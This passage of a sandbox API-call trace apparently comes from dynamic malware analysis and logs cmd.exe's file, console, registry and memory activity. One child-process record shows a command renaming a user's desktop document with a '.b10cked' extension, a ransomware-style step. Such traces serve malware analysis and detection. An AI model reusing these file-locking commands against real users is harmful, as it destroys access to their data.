(_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.533] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.533] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.534] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.534] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] GetFileType (hFile=0x4c) returned 0x1 [0139.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.534] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] GetFileType (hFile=0x4c) returned 0x1 [0139.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.535] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.535] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.535] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.535] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] GetFileType (hFile=0x4c) returned 0x1 [0139.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.536] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.536] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.536] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x32, lpOverlapped=0x0) returned 1 [0139.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.537] GetFileType (hFile=0x4c) returned 0x1 [0139.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.537] GetFileType (hFile=0x4c) returned 0x1 [0139.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.537] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x32, lpOverlapped=0x0) returned 1 [0139.537] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.537] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.537] _close (_FileHandle=4) returned 0 [0139.537] FindNextFileW (in: hFindFile=0x240e78, lpFindFileData=0x16f444 | out: lpFindFileData=0x16f444) returned 0 [0139.537] GetLastError () returned 0x12 [0139.537] FindClose (in: hFindFile=0x240e78 | out: hFindFile=0x240e78) returned 1 [0139.538] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0139.551] _close (_FileHandle=3) returned 0 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.551] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.551] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.552] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.552] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.552] SetConsoleInputExeNameW () returned 0x1 [0139.552] GetConsoleOutputCP () returned 0x1b5 [0139.552] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.552] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.552] exit (_Code=0) Process: id = "164" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14792 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14793 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14794 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14795 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14796 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14797 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14798 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14799 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14800 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14801 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15764 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15765 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15766 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 15767 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15769 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15770 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15771 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15772 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15773 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15774 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15776 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 15777 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15778 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15779 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15780 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15781 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 15782 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 15783 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 15784 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 15785 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 221 os_tid = 0xe5c [0140.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8f4 | out: lpSystemTimeAsFileTime=0x18f8f4*(dwLowDateTime=0x8dbfe080, dwHighDateTime=0x1d440a9)) [0140.625] GetCurrentProcessId () returned 0xe60 [0140.625] GetCurrentThreadId () returned 0xe5c [0140.625] GetTickCount () returned 0x2c235 [0140.625] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8ec | out: lpPerformanceCount=0x18f8ec*=19741643602) returned 1 [0140.628] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.628] __set_app_type (_Type=0x1) [0140.628] __p__fmode () returned 0x76b331f4 [0140.628] __p__commode () returned 0x76b331fc [0140.628] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.628] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.629] GetCurrentThreadId () returned 0xe5c [0140.629] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe5c) returned 0x38 [0140.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.629] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.629] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.629] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f884 | out: phkResult=0x18f884*=0x0) returned 0x2 [0140.629] VirtualQuery (in: lpAddress=0x18f8bb, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.629] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f854, dwLength=0x1c | out: lpBuffer=0x18f854*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.629] GetConsoleOutputCP () returned 0x1b5 [0140.630] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.630] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.630] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.630] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.630] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.630] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.630] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.631] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.631] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.631] GetEnvironmentStringsW () returned 0x300168* [0140.631] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0140.631] GetEnvironmentStringsW () returned 0x300168* [0140.631] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0140.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7f4 | out: phkResult=0x18e7f4*=0x40) returned 0x0 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x90, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.631] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x0, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | 